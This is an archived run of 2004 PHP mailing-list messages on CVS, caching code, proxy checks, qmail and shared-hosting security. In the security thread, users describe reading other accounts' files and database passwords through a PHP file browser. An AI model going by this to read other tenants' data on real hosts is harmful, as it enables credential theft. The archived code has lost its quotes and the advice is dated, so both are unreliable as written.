On Monday 27 September 2004 02:26, Chris Shiflett wrote: If you do not offer CGI access or any interpreter besides PHP, then I suppose it's better than nothing, but I wouldn't characterize this as safe. I suspect that if I were a user on this host, I could give you a URL that displays another account's password within a few minutes. But, I'm just speculating. :-) Stop it! You're scaring away his customers ;-) -- Jason Wong - Gremlins Associates - www.gremlins.biz Open Source Software Systems Integrators * Web Design Hosting * Internet Intranet Applications Development * -- Search the list archives before you post http://marc.theaimsgroup.com/?l=php-general -- /* Whatever women do they must do twice as well as men to be thought half as good. Luckily this is not difficult. -- Charlotte Whitton */ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] RE: Version Controlling
On Monday 27 September 2004 02:28, Stephen Craton wrote: Thanks for the info, but I do have an extra question about CVS. Do I always need access to the internet to get my files to work one them? Yes and no. And depends on where your CVS server is located. Obviously if the computer you're working on also hosts the CVS server then you don't need internet access. When you work with CVS you usually: - check out a set of files (for which you need access to the CVS server) - edit them (no access needed) - when you're sure you've fixed more bugs than you've introduced, you commit those files, ie send the changes to the CVS server (for which you need access to the CVS server) -- Jason Wong - Gremlins Associates - www.gremlins.biz Open Source Software Systems Integrators * Web Design Hosting * Internet Intranet Applications Development * -- Search the list archives before you post http://marc.theaimsgroup.com/?l=php-general -- /* You would if you could but you can't so you won't. */ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] 9 line function logic problem
Hi!
Try to globalize the $include_path variable:
function is_cache($get_file) {
global $include_path;
...
}
bagheera
Mag wrote:
Hi,
I am going crazy with this function please have a look
at it and tell me what i am doing wrong.
This is my setup:
I have a file called one.html.cache in the directory
/cache/
in one.html.cache I have a time()+ 3600 number (eg:
1096224755)
I need to know if the number in that file is still
bigger than the present time() or not
the problem is, it is always returning zero...
heres the function:
echo b.is_cache(one.html);
function is_cache($get_file)
{
$th_file = $include_path.$get_file . '.cache';
$fp = fopen($th_file, 'a+');
fseek($fp, 0);
$rd = fread($fp, filesize($th_file));
fclose($fp);
if (time() - $rd 5)
return 0;
else
return 1;
}
What am i doing wrong? or is there a better way of
doing this?
Thanks,
Mag
=
--
- The faulty interface lies between the chair and the keyboard.
- Creativity is great, but plagiarism is faster!
- Smile, everyone loves a moron. :-)
__
Do you Yahoo!?
Take Yahoo! Mail with you! Get it on your mobile phone.
http://mobile.yahoo.com/maildemo
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] php security on shared hosts
[snip] I just published a free article on my Web site about shared hosting: http://shiflett.org/articles/security-corner-mar2004 In short, what you've found is typical for most shared hosts, and safe_mode (a directive created to help mitigate this problem a bit) does little to help. However, there are some things you can do as a developer, and I give some specific examples. [/snip] Hi, Chris. Thanks for that link. It was incredibly informative. I just took your code for the file browser and it was able to read the information in all users' webroots and all other directories and files readable by nobody:nobody, including database passwords, .htaccess files (which contained paths to password and group files), etc. There was no /etc/passwd file, but this is irrelevant as I was simply able to browse the /virtual directory to see a list of all users home directories, and from there their webroots, etc. I guess it is an inevitable fact that if you are on a shared host, any script executed from the browser is capable of reading any other script on the server which is set to be readable by the web server. I usually store all my files with sensitive information and class files outside the webroot, but under this setup, anyone could simply read the contents of the files in the webroot and use the information in those files to then read the files which are store outside of the webroot. Unfortunately I don't have access to my server config file (a 'find' command for httpd.conf returned no results), so is this something a host would usually change for individual users? Also, safe_mode is not enabled on this host so I while I assume that I could enable it using .htaccess for my site, that still would not prevent anyone else from reading my scripts since their scripts would not be running in safe mode, right? Thoughts? Cheers and TIA, Pablo. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Best way to save preferences?
On Sun, 2004-09-26 at 10:00, Victor Spng Arthursson wrote: Which is the best way to save preferences (for a site) to make them easily accessable for changes? What I want is a way to save arrays and read them in again without having to use a database Thankful for suggests, sincerely Victor http://www.sqlite.org/ perhaps? -- /*** * Robby Russell | Owner.Developer.Geek * PLANET ARGON | www.planetargon.com * Portland, OR | [EMAIL PROTECTED] * 503.351.4730 | blog.planetargon.com * PHP/PostgreSQL Hosting Development / signature.asc Description: This is a digitally signed message part
Re: [PHP] Testing Response of A Proxy with PHP?
Nick Wilson wrote: * and then Marek Kilimajer declared I cant find any functions that might help me test the response of a proxy server b4 attempting to use it. Do i need to use exec() with ping? Anyone know how to do that? (if that's the case...) What kind of response? If the server is alive, if the proxy is alive? If an url exists? hehe, good point! Just if the server is alive i guess. I want to use the proxy and want to test if it's responsive b4 i attempt to use it... OPTIONS * HTTP/1.0 More at http://www.freesoft.org/CIE/RFC/2068/63.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] PHP Counter?
Nick Wilson wrote: Hi all, I have a script that at the present just outputs '$count .'br /'' after each iteration of a foreach() loop. I have set implicit_flush so that this works. That's clearly monkey poo though eh? :-) Do I have to get into unkown waters and try and make PHP talk to JS to achieve a kind of 'hit counter' like effect or is there some easier way? ::explanation It should print the $count var after each iteration *replacing* the last $count Im stumped. A little guidance would be much appreciated... Either JS or Refresh header with some timeout. With JS you can use a input textbox styled to not have any borders. Refresh header will refresh the whole page. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Testing Response of A Proxy with PHP?
* and then Marek Kilimajer declared OPTIONS * HTTP/1.0 More at http://www.freesoft.org/CIE/RFC/2068/63.htm oookay... i think i understand the page, but how would i imlement that and what would be the difference in that and just pinging the server to see if it's responding? Thanks for the help.. -- Nick W -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Testing Response of A Proxy with PHP?
Nick Wilson wrote:
* and then Marek Kilimajer declared
OPTIONS * HTTP/1.0
More at http://www.freesoft.org/CIE/RFC/2068/63.htm
oookay... i think i understand the page, but how would i imlement that
$fp = fsockopen (proxy.server.net, 8080, $errno, $errstr, 30);
if (!$fp) {
echo $errstr ($errno)br\n;
} else {
fputs ($fp, OPTIONS * HTTP/1.0\r\nMax-Forwards: 0\r\n\r\n);
while (!feof($fp)) {
echo fgets ($fp,128);
}
fclose ($fp);
}
You should get something like:
HTTP/1.0 200 Ok
Date: Sun, 26 Sep 2004 20:48:46 GMT
Via: HTTP/1.1 proxy.server.net (Traffic-Server/4.0.18 [c s f ])
Allow: CONNECT, DELETE, GET, HEAD, OPTIONS, POST, PURGE, PUT, PUSH, TRACE
Content-Length: 0
and what would be the difference in that and just pinging the server to
see if it's responding?
Even if the server is up that does not mean proxy is working.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] php security on shared hosts
--- Pablo Gosse [EMAIL PROTECTED] wrote: http://shiflett.org/articles/security-corner-mar2004 [snip] Hi, Chris. Thanks for that link. It was incredibly informative. I'm glad you thought so. :-) I just took your code for the file browser and it was able to read the information in all users' webroots and all other directories and files readable by nobody:nobody, including database passwords, .htaccess files (which contained paths to password and group files), etc. Right, and this isn't unusual. What I should probably do is write one of these simple filesystem browsers in various shells, Perl, and any other type of interpreter commonly available on shared hosts. This might better illustrate that things like safe_mode are no solution. I guess it is an inevitable fact that if you are on a shared host, any script executed from the browser is capable of reading any other script on the server which is set to be readable by the web server. Yep, it sounds like you understand the problem quite well. What some people miss is the fact that the contents of a file have nothing to do with filesystem privileges and such. The fact that one file has PHP code in it is irrelevant. I usually store all my files with sensitive information and class files outside the webroot, but under this setup, anyone could simply read the contents of the files in the webroot and use the information in those files to then read the files which are store outside of the webroot. This is still a very good practice, and I hope you continue to use it. Unfortunately I don't have access to my server config file (a 'find' command for httpd.conf returned no results), so is this something a host would usually change for individual users? It should be, and you can always point them to my article if they don't understand why you want this. Is your host running Apache? Also, safe_mode is not enabled on this host so I while I assume that I could enable it using .htaccess for my site, that still would not prevent anyone else from reading my scripts since their scripts would not be running in safe mode, right? That's exactly right. Also, the bad guys might be Perl programmers. :-) Chris = Chris Shiflett - http://shiflett.org/ PHP Security - O'Reilly Coming December 2004 HTTP Developer's Handbook - Sams http://httphandbook.org/ PHP Community Site http://phpcommunity.org/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] php security on shared hosts
[snip] In short, what you've found is typical for most shared hosts [/snip] I've just been reviewing the way sites are housed on my host, and what directories are readable by the web server and I'm curious to get opinions on this. When I use Chris' file browser script, there is a folder called 'virtual' in the site root, and it is readable by the web browser. Inside /virtual there are three folders for every site, which I list below. -- site357 pablogosse.com admin357 -- Browsing these for my site I see the following: site357: 4096 ./ 20480 ../ 4096 fst/ 4096 info/ pablogosse.com and admin357: 4096 ./ 4096 ../ 4096 bin/ 4096 boot/ 4096 dev/ 4096 etc/ 4096 home/ 4096 initrd/ 4096 lib/ 4096 mnt/ 4096 opt/ 4096 proc/ 4096 root/ 4096 sbin/ 4096 tmp/ 4096 usr/ 4096 var/ 498subdomain 4096 mysql/ 7392 dump.xml Also, if I browse the fst/ folder inside site357, I get the same results as pablogosse.com and admin357. I'm then able to browse freely through all the above folders except /home and /root. I'm no security expert so I have to ask, is this indeed normal? Cheers and TIA. Pablo -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Testing Response of A Proxy with PHP?
* and then Marek Kilimajer declared
oookay... i think i understand the page, but how would i imlement that
$fp = fsockopen (proxy.server.net, 8080, $errno, $errstr, 30);
if (!$fp) {
echo $errstr ($errno)br\n;
} else {
fputs ($fp, OPTIONS * HTTP/1.0\r\nMax-Forwards: 0\r\n\r\n);
while (!feof($fp)) {
echo fgets ($fp,128);
}
fclose ($fp);
}
Okay, thanks marek, i can take it from there ;-)
Im tired, its past my bedtime, i'll check the manual in the morning and
work on your code. Thanks very, very much!
Even if the server is up that does not mean proxy is working.
Yep, i get it. THanks..
--
Nick W
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] php security on shared hosts
Ahhh...ok, now you're talking about something else. I thought we were just talking about the security model of PHP only. Yes, if a host has decided to offer another means for CGI that isn't safe, then that is another issue all together...;) I was just talking about PHP's security model. Safe mode + open_basedir + included directories + exec directories should be enough to prevent a PHP script from viewing the tree, and anyone else's data. If you have a way, using PHP (not a perl or sh or tcl script), to get around those directives, then please let me know. Personally, I never wanted to offer any CGI scripting to our customers, but in this day and age, a shared host has to, because the customers expect it, even though they have no idea how to use it. So I've created a jailed environment for perl to run as the user, and away from everyone else's directories. I am still wary of how safe that is, but its as close as I can get it... Seriously, let me know if you've got any issues with PHP's security model. Tim. At 11:26 AM 9/26/2004, Chris Shiflett wrote: --- Tim Traver [EMAIL PROTECTED] wrote: I believe that is the reason that the PHP group came up with the open_basedir directive. The open_basedir prevents you from looking into anything higher than a particular directory tree using PHP. So, a combination of safe_mode and open_basedir should prevent your script from being able to walk the tree. We know what these directives do. I think you're missing the point. How can a PHP directive offer any protection against someone writing a CGI that reads a file somewhere? Think about it. I didn't think there was, and if there is, then we better post that to the security guys at php, cause that's not good. We know that neither safe_mode nor open_basedir offer protection from this. We also know that it's impossible to solve this problem at the PHP level, because it is completely independent of PHP. I think it should be pretty safe though if implemented correctly. If you do not offer CGI access or any interpreter besides PHP, then I suppose it's better than nothing, but I wouldn't characterize this as safe. I suspect that if I were a user on this host, I could give you a URL that displays another account's password within a few minutes. But, I'm just speculating. :-) Chris = Chris Shiflett - http://shiflett.org/ PHP Security - O'Reilly Coming December 2004 HTTP Developer's Handbook - Sams http://httphandbook.org/ PHP Community Site http://phpcommunity.org/ SimpleNet's Back ! http://www.simplenet.com
[PHP] mail function and qmail
mail function in php requires to use 'sendmail'. But I have only 'qmail' on the box. How I can send email in PHP? Thanks -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] php security on shared hosts
Pablo, I tested Chris's script on our systems, and couldn't browse anywhere other than my own directories, so it is possible to set php up on shared hosts that is a lot more secure than what your host has done. May I ask what host this is ? Is it a major one ? Tim. At 02:09 PM 9/26/2004, Pablo Gosse wrote: [snip] In short, what you've found is typical for most shared hosts [/snip] I've just been reviewing the way sites are housed on my host, and what directories are readable by the web server and I'm curious to get opinions on this. When I use Chris' file browser script, there is a folder called 'virtual' in the site root, and it is readable by the web browser. Inside /virtual there are three folders for every site, which I list below. -- site357 pablogosse.com admin357 -- Browsing these for my site I see the following: site357: 4096 ./ 20480 ../ 4096 fst/ 4096 info/ pablogosse.com and admin357: 4096 ./ 4096 ../ 4096 bin/ 4096 boot/ 4096 dev/ 4096 etc/ 4096 home/ 4096 initrd/ 4096 lib/ 4096 mnt/ 4096 opt/ 4096 proc/ 4096 root/ 4096 sbin/ 4096 tmp/ 4096 usr/ 4096 var/ 498subdomain 4096 mysql/ 7392 dump.xml Also, if I browse the fst/ folder inside site357, I get the same results as pablogosse.com and admin357. I'm then able to browse freely through all the above folders except /home and /root. I'm no security expert so I have to ask, is this indeed normal? Cheers and TIA. Pablo -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php SimpleNet's Back ! http://www.simplenet.com
[PHP] Re: mail function and qmail
Php Mysql wrote: mail function in php requires to use 'sendmail'. But I have only 'qmail' on the box. How I can send email in PHP? Thanks just pretend it doesn't say sendmail but qmail. It works on both :) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Conceptual ?: using 'multi-purpose' form for validation
On Sunday 26 September 2004 04:35, Marek Kilimajer wrote: Whil Hentzen wrote: I can get a single form to call itself again if there's nothing fancy going on. This code will prompt the user for their mail if it doesn't already exist, and if the email does exist, provides some data out of database. ?php $email = (isset($_POST['email']) ? $_POST['email'] : ''); if ( !validate_email($email) ): ? !-- No email, so prompt the user for one.-- Thanks for the quick response. At this point, I feel a little like Einstein's wife, who, when asked if she understood the papers that her husband wrote, said, I understand the words, but not the sentences. I gather that the 'validate_email' is a separate function that I will write, passing the email var, and getting either a T or F response. Now... where does this go? In the PHP page? A separate function in a separate .php file? Or? Thanks, -- Whil Moving to Linux: Freedom, Choice, Security, Opportunity http://www.hentzenwerke.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: mail function and qmail
Php Mysql wrote: mail function in php requires to use 'sendmail'. But I have only 'qmail' on the box. How I can send email in PHP? Thanks Hi, After u installed qmail, there is a qmail compatible sendmail created for you in /var/lib/qmail/bin (i think that's where it should be). As qmail docu' says y should copy or symlink this sendmail to the /bin/sendmail or /usr/bin/sendmail on u'r system. Make sure u first backup u'r original sendmail. This should make PHP's mail stuff work as expected with qmail hope this helps, Catalin -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
